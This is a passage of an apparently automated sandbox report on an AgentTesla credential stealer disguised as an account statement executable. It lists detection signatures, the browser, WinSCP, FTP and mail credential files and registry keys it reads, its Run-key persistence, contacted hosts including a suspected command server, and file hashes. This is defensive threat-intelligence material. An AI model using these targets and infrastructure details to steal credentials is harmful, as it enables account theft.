                    Source: Yara matchFile source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 1288, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7116, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6292, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 4828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 1288, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7116, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6292, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 4828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Statement of Account - USD 16,720.00.exe PID: 1288, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 7116, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6292, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582790 Sample: Statement of Account - USD ... Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 29 s4.serv00.com 2->29 31 api.ipify.org 2->31 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 9 other signatures 2->57 7 Statement of Account - USD 16,720.00.exe 2 2->7         started        9 adobe.exe 2 2->9         started        12 adobe.exe 2 2->12         started        signatures3 process4 signatures5 14 Statement of Account - USD 16,720.00.exe 16 4 7->14         started        59 Antivirus detection for dropped file 9->59 61 Multi AV Scanner detection for dropped file 9->61 63 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 9->63 65 Machine Learning detection for dropped file 9->65 19 adobe.exe 14 2 9->19         started        21 adobe.exe 9->21         started        23 adobe.exe 2 12->23         started        process6 dnsIp7 33 s4.serv00.com 213.189.52.181, 21, 49707, 49709 ECO-ATMAN-PLECO-ATMAN-PL Poland 14->33 35 api.ipify.org 104.26.12.205, 443, 49704, 49712 CLOUDFLARENETUS United States 14->35 25 C:\Users\user\AppData\Roaming\...\adobe.exe, PE32 14->25 dropped 27 C:\Users\user\...\adobe.exe:Zone.Identifier, ASCII 14->27 dropped 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->37 39 Tries to steal Mail credentials (via file / registry access) 14->39 41 Drops executable to a common third party application directory 14->41 43 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->43 45 Tries to harvest and steal ftp login credentials 23->45 47 Tries to harvest and steal browser information (history, passwords, etc) 23->47 49 Installs a global keyboard hook 23->49 file8 signatures9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Statement of Account - USD 16,720.00.exe34%VirustotalBrowse
                    Statement of Account - USD 16,720.00.exe50%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                    Statement of Account - USD 16,720.00.exe100%AviraHEUR/AGEN.1306767
                    Statement of Account - USD 16,720.00.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%AviraHEUR/AGEN.1306767
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe50%ReversingLabsByteCode-MSIL.Trojan.GenSteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://s4.serv00.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high
                      s4.serv00.com
                      		213.189.52.181
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgStatement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://account.dyn.com/Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org/tStatement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStatement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://s4.serv00.comStatement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.26.12.205
                                  		api.ipify.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  213.189.52.181
                                  		s4.serv00.comPoland
                                  		57367ECO-ATMAN-PLECO-ATMAN-PLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1582790
                                  Start date and time:2024-12-31 14:01:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 34s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Statement of Account - USD 16,720.00.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@11/2@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 221
                                  • Number of non-executed functions: 20
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  08:01:55API Interceptor7365586x Sleep call for process: Statement of Account - USD 16,720.00.exe modified
                                  08:02:09API Interceptor5926229x Sleep call for process: adobe.exe modified
                                  14:01:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                  14:02:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.26.12.205RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                  • api.ipify.org/
                                  jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/?format=text
                                  xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                  • api.ipify.org/
                                  GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                  • api.ipify.org/
                                  8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                  • api.ipify.org/
                                  Simple2.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                  • api.ipify.org/
                                  Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                  • api.ipify.org/
                                  perfcc.elfGet hashmaliciousXmrigBrowse
                                  • api.ipify.org/
                                  213.189.52.181HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                    Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                      Arrival Notice - BL 713410220035.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                        BL NBNSA240600050.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          DC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                              Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s4.serv00.comHBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                Arrival Notice - BL 713410220035.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                BL NBNSA240600050.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 213.189.52.181
                                                DC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 213.189.52.181
                                                PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                api.ipify.orgRtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                • 104.26.12.205
                                                Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                • 104.26.13.205
                                                Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                • 104.26.13.205
                                                soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                • 104.26.13.205
                                                markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                • 104.26.13.205
                                                utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                • 172.67.74.152
                                                https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45Get hashmaliciousHTMLPhisherBrowse
                                                • 104.26.12.205
                                                https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSMJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                • 162.159.61.3
                                                MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                • 172.64.41.3
                                                5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                • 104.21.96.1
                                                zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.112.1
                                                2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.64.1
                                                Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                • 104.21.112.1
                                                bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.64.1
                                                6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                • 172.64.41.3
                                                Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                • 172.64.41.3
                                                x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.112.1
                                                ECO-ATMAN-PLECO-ATMAN-PLeu6OEBpBCI.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 91.227.41.9
                                                HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                Amalgamers.exeGet hashmaliciousAgentTeslaBrowse
                                                • 185.36.171.17
                                                Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                • 213.189.52.181
                                                9zldYT23H2.elfGet hashmaliciousMirai, GafgytBrowse
                                                • 31.186.82.2
                                                RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                • 128.204.223.111
                                                http://bdvenlineabanven.serv00.net/Get hashmaliciousUnknownBrowse
                                                • 85.194.246.69
                                                http://entrabdvline.serv00.net/Get hashmaliciousUnknownBrowse
                                                • 85.194.246.69
                                                http://entrabdvline.serv00.net/Get hashmaliciousUnknownBrowse
                                                • 85.194.246.69
                                                http://ahksoch.serv00.net/x92gamy6wh/Get hashmaliciousHTMLPhisherBrowse
                                                • 128.204.218.63

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eGYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                • 104.26.12.205
                                                Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 104.26.12.205
                                                re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                • 104.26.12.205
                                                file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 104.26.12.205
                                                Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                • 104.26.12.205
                                                Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 104.26.12.205
                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                • 104.26.12.205
                                                XClient.exeGet hashmaliciousXWormBrowse
                                                • 104.26.12.205

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Roaming\Adobe\adobe.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):486912
                                                Entropy (8bit):7.480821743600628
                                                Encrypted:false
                                                SSDEEP:6144:Y9yYMqdl+a/ZNntauGBOaYcR/uVc3fTlAoOjlrrhTFInd6Xcfg9UJU8:2dMqdl+YZNorUVcvWoOJFTWndm+
                                                MD5:CF173CA1DB13DFC7237FD33630926B65
                                                SHA1:783E42E20DA75EA1A2FD7A02E3824F251F26CF4F
                                                SHA-256:1B9D152C5CD6E2904ADA0CA707DBD2BB089AC59F8B07723490552A000848CC54
                                                SHA-512:31A7210E2EF813763225C39F5C42F00CD7899539755FD090E256AB17A16C88238E9A659BED9CF4BFD9F5BCB310FB850A6E2E04C41AAF1F2F8FD98DB99FA8ADDC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Reputation:low
